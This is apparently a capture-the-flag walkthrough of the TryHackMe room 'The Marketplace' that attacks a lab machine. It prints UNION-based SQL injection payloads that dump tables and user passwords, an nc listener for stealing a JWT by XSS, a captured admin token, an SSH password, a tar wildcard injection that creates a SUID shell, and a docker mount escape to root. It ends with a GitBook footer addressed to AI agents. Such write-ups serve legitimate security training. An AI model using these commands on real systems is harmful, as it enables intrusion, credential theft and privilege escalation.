> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace.md). # The Marketplace **Room Link:** ## Initial Scan **Kali**

nmap -A $VICTIM

## Scan all ports **Kali**

nmap -sV -sT -O -p 1-65535 $VICTIM

## TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ``` ## TCP/32768 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM:32768 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```

## XSS - Steal JVT

I tried updating the token it didn't work

Next we're going to try to steal the JWT from another user. **Kali** ``` nc -lvnp 4444 ``` **Browser** ``` ```

This was annoying because if I went to my posts it wouldn't work so I went to Jakes post and changed the number from 2 to 6 to get to the report page. Then just clicked the report button

we got a token from a user that isn't us

We can see it is from Michael who is an admin.

Sent again but this time just forwarded the request so we could see what that script was doing

The script was printing the flag

This wasn't working before but after next time I went to this box tried I could just update the cookie from the browser and it worked.

**Brower cookie** ``` eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MDE1MjgzODN9.O8218jJ0nmWedeewklX6fkb9sjlgH81ciU7dJG5l9YY ``` We add a order by and increase the number until we get an error to reveal how many fields there are.

After 5 it give us an error so we know there are four fields

We do a union select, first to try to show our 1s which isn't working because the first part of the statement runs successfully so theres no where to put our info

To work around this we make the userid as 0 which probably doesn't exist and we can start seeing our 1s

Get Version

Get Database

Get tables ``` UNION SELECT table_name,1,1,1 FROM information_schema.tables WHERE table_schema=database() ```

Get All tables by concat ``` -1 UNION SELECT group_concat(table_name),1,1,1%20 FROM information_schema.tables WHERE table_schema =database() ```

Get Columns for table users ``` -1%20UNION%20SELECT%20group_concat(column_name,column_type),1,1,1%20%20FROM%20information_schema.columns%20WHERE%20table_schema=marketplace ```

Get Columns for table items ``` -1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='items' AND table_schema='marketplace' ```

Get Columns for table messages ``` -1 UNION SELECT group_concat(column_name,column_type),1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='messages' AND table_schema='marketplace' ```

Get Columns for table messages ``` -1%20UNION%20SELECT%20group_concat(message_content),1,1,1%20FROM%20messages ```

Get usernames and passwords. The passwords aren't too useful at this point but now we have some usernames. ``` -1%20UNION%20SELECT%20group_concat(username,%27|%27,password),1,1,1%20FROM%20users ```

## TCP/22 - SSH **Kali** ``` ssh jake@$VICTIM Password: @b_ENXkGYUCAv3zJ ```

## **Lateral Movement** **Exploit:** Jake can run a backup script as michael. The script is using a wildcard which we manipulate.

We can trick the script to run this to get a shell by making empty files with similar names

**Victim** ``` cd /opt/backups mkdir priv cd priv touch ./--checkpoint=1 touch ./--checkpoint-action=exec=sh shell.sh vi shell.sh ``` **shell.sh** ``` #!/bin/bash cp /bin/bash /opt/backups/michealbash; chmod +xs /opt/backups/michealbash; ``` **Victim** ``` chmod +x shell.sh rm -f ../backup.tar sudo -u michael /opt/backups/backup.sh ```

## **Privilege Escalation** **Victim(micheal)** ``` id find / -name docker.sock 2>/dev/null docker images docker run -it -v /:/host/ alpine chroot /host/ sh ``` michael is part of the docker group so it appears we're in a pod

There a few images to test from. I just ran the last command above and changes the image name until it worked. Exploit worked with nginx and mysql images as well.

--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/the-marketplace.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.